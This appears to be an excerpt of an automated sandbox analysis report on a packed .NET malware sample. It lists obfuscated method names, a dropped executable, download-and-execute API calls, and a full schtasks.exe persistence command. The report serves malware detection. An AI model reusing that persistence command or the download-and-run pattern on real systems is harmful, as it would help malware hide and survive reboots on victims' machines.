                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, yYA4bnqoCZikPYmxm6.csHigh entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, UeQWNuckJlDLwjm9Mk.csHigh entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.csHigh entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, yyrLeV732OmOLQWpNj.csHigh entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, hOeFcZoKQuGvhRZZQ2.csHigh entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, jEORRnfif3v3h627MY.csHigh entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, c3ElsUsg35p7GQ8AoN.csHigh entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, QhBFofCVxaxcONJT4Z.csHigh entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, PbFXXttaZcfdoJYktQ.csHigh entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, BLh0makLbVCyodwVhw.csHigh entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, vZx1jpD6tHD72wa9Ou.csHigh entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, uwB1hsrNlOFW0DGWr7.csHigh entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, kYFp04GVFWfjctExZu.csHigh entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, awBYIillJCrx859gbfK.csHigh entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, OUJVU18LcdRqehKk9N.csHigh entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, XtEEgg9xesWJtxv6yV.csHigh entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, QBTSLvlpZKgHT3rkupM.csHigh entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, uqSYAbh6QxVZvqyqsQ.csHigh entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, AtSJYkzd1YVml9kH6m.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, DZhuR1lEXb724OFE0jy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, yYA4bnqoCZikPYmxm6.csHigh entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, UeQWNuckJlDLwjm9Mk.csHigh entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.csHigh entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, yyrLeV732OmOLQWpNj.csHigh entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, hOeFcZoKQuGvhRZZQ2.csHigh entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, jEORRnfif3v3h627MY.csHigh entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, c3ElsUsg35p7GQ8AoN.csHigh entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, QhBFofCVxaxcONJT4Z.csHigh entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, PbFXXttaZcfdoJYktQ.csHigh entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, BLh0makLbVCyodwVhw.csHigh entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, vZx1jpD6tHD72wa9Ou.csHigh entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, uwB1hsrNlOFW0DGWr7.csHigh entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, kYFp04GVFWfjctExZu.csHigh entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, awBYIillJCrx859gbfK.csHigh entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, OUJVU18LcdRqehKk9N.csHigh entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, XtEEgg9xesWJtxv6yV.csHigh entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, QBTSLvlpZKgHT3rkupM.csHigh entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, uqSYAbh6QxVZvqyqsQ.csHigh entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, AtSJYkzd1YVml9kH6m.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, DZhuR1lEXb724OFE0jy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, yYA4bnqoCZikPYmxm6.csHigh entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, UeQWNuckJlDLwjm9Mk.csHigh entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.csHigh entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, yyrLeV732OmOLQWpNj.csHigh entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, hOeFcZoKQuGvhRZZQ2.csHigh entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, jEORRnfif3v3h627MY.csHigh entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, c3ElsUsg35p7GQ8AoN.csHigh entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, QhBFofCVxaxcONJT4Z.csHigh entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, PbFXXttaZcfdoJYktQ.csHigh entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, BLh0makLbVCyodwVhw.csHigh entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, vZx1jpD6tHD72wa9Ou.csHigh entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00406EEB ShellExecuteW,URLDownloadToFileW,15_2_00406EEB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_0041AADB

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CBE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
